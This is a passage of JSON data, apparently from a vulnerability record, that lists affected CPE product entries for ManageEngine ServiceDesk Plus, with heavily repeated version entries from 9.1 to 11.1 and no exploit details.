"zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.2", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.3", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "9.4", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.0.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "10.5", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.0", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "version": "11.1", "operator": "eq", "name": "zohocorp manageengine servicedesk plus"}, {"cpeName": 